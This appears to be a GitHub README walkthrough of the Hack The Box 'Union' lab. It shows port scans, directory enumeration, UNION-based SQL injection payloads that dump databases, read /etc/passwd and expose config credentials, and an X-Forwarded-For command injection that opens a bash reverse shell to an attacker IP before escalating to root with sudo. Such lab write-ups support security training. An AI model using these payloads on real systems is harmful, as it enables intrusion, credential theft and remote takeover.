Skip to content

Latest commit

 

History

History
167 lines (97 loc) · 3.73 KB

README.md

File metadata and controls

167 lines (97 loc) · 3.73 KB
Raw

Union

nmap -p- --min-rate 10000 10.10.11.128 -Pn

alt text

After detection of open port (80), let's do greater scan for this port.

nmap -A -sC -sV -p80 10.10.11.128 -Pn

alt text

Let's do Directory Enumeration via gobuster tool.

gobuster dir -u http://10.10.11.128/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -t 40

alt text

While browsing challenge.php, it asks flag from me.

alt text

But on main page, I mean index.php, there's requst like asking username from me.

alt text

Our request is like below.

alt text

We can fuzz here via SQLI payloads.

alt text

Let's add UNION SQLI payload into here.

player=test' union select user();-- -

alt text

Let's dump databases names via below payload.

player=test' union select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.schemata;-- -

alt text

Let's select november database and dump tables from here.

player=' union select group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema='november';-- -

alt text

Let's dump data from flag table.

player=' union select group_concat(one) from flag;-- -

alt text

Flag: UHC{F1rst_5tep_2_Qualify}

We need to enter this into /challenge.php file.While we enter this flag, it says such an answer from firewall.php file.

alt text

Let's dump local files via this SQL Injection attack by using load_file() function of MySQL.

player=' union select load_file('/etc/passwd');-- -

alt text

Let's dump config.php file which is located on var/www/html/config.php directory.

player=' union select load_file('/var/www/html/config.php');-- -

alt text

I take credentials from here for my target machine.

uhc: uhc-11qual-global-pw

Let's check this credentials via ssh command.

user.txt

alt text

I just make enumeration for files and find interesting stuff from firewall.php file.

alt text

From this file, you can see system function which executes system commands and it is dangerous.

system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");

If we abuse here by adding malicious content into X-Forwarded-For HTTP request header, we can execute system commands.

Note: X-Forwarded-For http request header is used to detect IP address of client. Here's also implemented.

Let's check by sending request which contains system command ping to see Command Injection attack works or not.

X-FORWARDED-FOR: 1.1.1.1; ping -c 1 10.10.14.18;

alt text

I can see this command executed or not via tcpdump -I tun0 cmdlet.

alt text

Now, it's time for reverse shell adding to this Command Injection part.

X-FORWARDED-FOR: 1.1.1.1; bash -c "bash -i >& /dev/tcp/10.10.14.18/1337 0>&1";

alt text

Hola!, I got reverse shell from port 1337.

alt text

Let's make interactive shell via below commands.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash

alt text

Let's check privileges of this user via sudo -l command.

alt text

As you see, that's so easy part of Privilege Escalation, it means if we do sudo -s, we can get root shell.

root.txt

alt text